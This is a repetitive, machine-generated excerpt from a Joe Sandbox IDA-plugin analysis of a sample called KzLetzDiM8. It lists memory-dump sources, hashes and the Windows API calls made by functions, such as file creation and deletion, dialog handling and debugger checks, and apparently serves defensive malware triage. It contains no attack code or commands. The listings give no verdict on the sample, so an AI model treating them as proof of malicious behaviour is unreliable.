                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 10ec8477af238642d4b8539743080c2f01ddda2ef7fb2c509efb8c3ed2e463bd
                                                            • Instruction ID: 1d2ba908b0a84f268967cf0af3fc06dbe4eea1bce522cc432ba770c7b6ea110a
                                                            • Opcode Fuzzy Hash: 10ec8477af238642d4b8539743080c2f01ddda2ef7fb2c509efb8c3ed2e463bd
                                                            • Instruction Fuzzy Hash: E5A012C91E82483C300821601C02C37058CC0E1B21331412DF501840A4694008500830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fbc1a9546d7f91b47bfa1a9e63a8cc5e307b38fc66e4ed779d11edd878c8b9c2
                                                            • Instruction ID: 1a912d6f4df434777d9ceafe29eb9d210e94ed55227b6dc4ff9ee665bbbd4a67
                                                            • Opcode Fuzzy Hash: fbc1a9546d7f91b47bfa1a9e63a8cc5e307b38fc66e4ed779d11edd878c8b9c2
                                                            • Instruction Fuzzy Hash: 95A012C95A91457C300831001C02C3B018CC0D2F60330441DF502800A569400C400470
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8f59b13d7f7c9a8d7eb51d32e7161287234efec0b58a684f112e94abb76b52a3
                                                            • Instruction ID: fe4469792de9734ad49e690f92d442baeff799726e841e3be1fea4a0fc086a2a
                                                            • Opcode Fuzzy Hash: 8f59b13d7f7c9a8d7eb51d32e7161287234efec0b58a684f112e94abb76b52a3
                                                            • Instruction Fuzzy Hash: 03A012C91EC2497C300821501C02C37018CC0D1B60331442DF502840A4694008500830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 72ada836cae8121a1b0074a9afa539fad76ad3baea6d2153ec6f07e3fb7946cc
                                                            • Instruction ID: fe4469792de9734ad49e690f92d442baeff799726e841e3be1fea4a0fc086a2a
                                                            • Opcode Fuzzy Hash: 72ada836cae8121a1b0074a9afa539fad76ad3baea6d2153ec6f07e3fb7946cc
                                                            • Instruction Fuzzy Hash: 03A012C91EC2497C300821501C02C37018CC0D1B60331442DF502840A4694008500830
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,001E903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 001E9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: a7fa84328a21cc42f4ad46afc215288b494295f51d7bb7fe84841a16e7887fb9
                                                            • Instruction ID: 794b9a8fdefd132fac786c8e74bfbf0b3e85870a4757e38bf403a156178f3115
                                                            • Opcode Fuzzy Hash: a7fa84328a21cc42f4ad46afc215288b494295f51d7bb7fe84841a16e7887fb9
                                                            • Instruction Fuzzy Hash: 74A0113008000A8A8E00AB30EA0808C3B22EB20BC030082A8A00ACA0A2CB22880B8A00
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,001FAE72,C:\Users\user\Desktop,00000000,0022946A,00000006), ref: 001FAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: b16fe06dea333e2f76a745ac90d8d0b2c83478b19a03451e63936cc5f88deda0
                                                            • Instruction ID: f71a3f41bf41c565b942b551278d13a593a8dc99c1dbabe614e7245eeafdd06b
                                                            • Opcode Fuzzy Hash: b16fe06dea333e2f76a745ac90d8d0b2c83478b19a03451e63936cc5f88deda0
                                                            • Instruction Fuzzy Hash: 0BA00271105141979A015B329F4954F76566F61751F05C425654584170DB35C960A515
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,001E95D6,?,?,?,?,?,00212641,000000FF), ref: 001E963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 47a3e03d7e204aa75e968fc2aae12d58ce0cd0be683a36b9ebb924bb9368a8d4
                                                            • Instruction ID: bda129dc7f7a7a5317a3400908642134e666a789e3e1ab1b7abf63a49e6f1383
                                                            • Opcode Fuzzy Hash: 47a3e03d7e204aa75e968fc2aae12d58ce0cd0be683a36b9ebb924bb9368a8d4
                                                            • Instruction Fuzzy Hash: A0F0E230081F95AFDB308B22C448B96B7E9AB26321F040B1FD0E2429E0D760AA8D8A40
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001FC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 001FC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 001FC2E0
                                                            • SetFocus.USER32(00000000), ref: 001FC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 001FC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001FC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 001FC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001FC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001FC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001FC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001FC3D4
                                                            • _swprintf.LIBCMT ref: 001FC404
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 001FC417
                                                            • FindClose.KERNEL32(00000000), ref: 001FC41E
                                                            • _swprintf.LIBCMT ref: 001FC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 001FC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001FC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001FC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001FC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001FC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001FC509
                                                            • _swprintf.LIBCMT ref: 001FC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 001FC548
                                                            • _swprintf.LIBCMT ref: 001FC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 001FC5AF
                                                              • Part of subcall function 001FAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001FAF35
                                                              • Part of subcall function 001FAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0021E72C,?,?), ref: 001FAF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 56a287d6ceb2eae45bde5917d7fbbe00811b8e5b88f6b8debceea0d8855cb34f
                                                            • Instruction ID: 8ed5d8d87d683b4495df986329c6efcc8eb12a70befdbb0b074f2e84d4c4898d
                                                            • Opcode Fuzzy Hash: 56a287d6ceb2eae45bde5917d7fbbe00811b8e5b88f6b8debceea0d8855cb34f
                                                            • Instruction Fuzzy Hash: 2A91827224834CBBD321DBA0DD49FFB77ECEB9A700F044819B749D6081DB75A6049B62
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E6FAA
                                                            • _wcslen.LIBCMT ref: 001E7013
                                                            • _wcslen.LIBCMT ref: 001E7084
                                                              • Part of subcall function 001E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001E7AAB
                                                              • Part of subcall function 001E7A9C: GetLastError.KERNEL32 ref: 001E7AF1
                                                              • Part of subcall function 001E7A9C: CloseHandle.KERNEL32(?), ref: 001E7B00
                                                              • Part of subcall function 001EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641,000000FF), ref: 001EA1F1
                                                              • Part of subcall function 001EA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641), ref: 001EA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 001E7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 001E7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001E7298
                                                              • Part of subcall function 001E9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001E73BC,?,?,?,00000000), ref: 001E9DBC
                                                              • Part of subcall function 001E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 001E9E70
                                                              • Part of subcall function 001E9620: CloseHandle.KERNELBASE(000000FF,?,?,001E95D6,?,?,?,?,?,00212641,000000FF), ref: 001E963B
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA501
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 35816727b427e569663b66435d2b321dd3ec8e3aa1d0d919d531c82eb436313e
                                                            • Instruction ID: 6aa957dc10c0c784cc48de8538a81bcd542082fa8ed59ebec1f23a7ccf2be1ab
                                                            • Opcode Fuzzy Hash: 35816727b427e569663b66435d2b321dd3ec8e3aa1d0d919d531c82eb436313e
                                                            • Instruction Fuzzy Hash: 8AC11871904B84AAEB25DB75DC45FEEB3ADBF28300F00455AFA56E31C2D730AA44CB61
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: af167eb51dd709f0a24692dee09c7e6385fd5142a26e5ff304c11c6fab3ab281
                                                            • Instruction ID: 8e0724025ca4c981aabe3bcabc33fab7511ad328a185faa153035fd44f7214b7
                                                            • Opcode Fuzzy Hash: af167eb51dd709f0a24692dee09c7e6385fd5142a26e5ff304c11c6fab3ab281
                                                            • Instruction Fuzzy Hash: 59C27B72E292298FDF25CE28DD407EAB7B5EB44304F1545EAD40DE7282E774AE918F40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: b515371d315647bc631c51dddecb1db88a9ed22db068c765fad2e5f6bbbe7d51
                                                            • Instruction ID: eea06ea7bf823d3142fc828c01274c25bc547aa669247a0d8bec1a6d2450ccc4
                                                            • Opcode Fuzzy Hash: b515371d315647bc631c51dddecb1db88a9ed22db068c765fad2e5f6bbbe7d51
                                                            • Instruction Fuzzy Hash: 7532D571510BC5ABDB18DF75C899AED37E5AF25300F04047DFD9A8B282DB709689CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E2874
                                                            • _strlen.LIBCMT ref: 001E2E3F
                                                              • Part of subcall function 001F02BA: __EH_prolog.LIBCMT ref: 001F02BF
                                                              • Part of subcall function 001F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001EBAE9,00000000,?,?,?,00010412), ref: 001F1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001E2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [ $[
                                                            • API String ID: 0-445114706
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001FF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 001FF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001FF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 001FF93A
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,001FE5E8,0000001C,001FE7DD,00000000,?,?,?,?,?,?,?,001FE5E8,00000004,00241CEC,001FE86D), ref: 001FE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,001FE5E8,00000004,00241CEC,001FE86D), ref: 001FE6CF
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00208FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00208FBF
                                                            • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00208FCC
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001FAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0021E72C,?,?), ref: 001FAF84
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            APIs
                                                            • GetLastError.KERNEL32(001E6DDF,00000000,00000400), ref: 001E6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 001E6C95
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002119EF,?,?,00000008,?,?,0021168F,00000000), ref: 00211C21
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001FF66A
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 001EB16B
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,001FF3A5), ref: 001FF9DA
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            APIs
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: b074ce30e986df07c8580d5e0a64eba88e8454c548b5e793fd7d884a7450a1af
                                                            • Instruction ID: f956bdd50fbfdf92b2ad3ecbeffe9c93e9124883bd6c358e36dc3d311e556b4a
                                                            • Opcode Fuzzy Hash: b074ce30e986df07c8580d5e0a64eba88e8454c548b5e793fd7d884a7450a1af
                                                            • Instruction Fuzzy Hash: E1A00174602201EB9744CF36BE4D6893AAAAA6669174A806AA909C5160EA2485A4AB01
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                            • Instruction ID: 352865a12accefcf56c0a9bb7912403f035e1d242925c5b7e20ec7114ac1e3c4
                                                            • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                            • Instruction Fuzzy Hash: E062D871604B889FCB29CF38C4906B9BBE1BF95304F09896DD9EA8B346D734E945CB11
                                                            Memory Dump Source
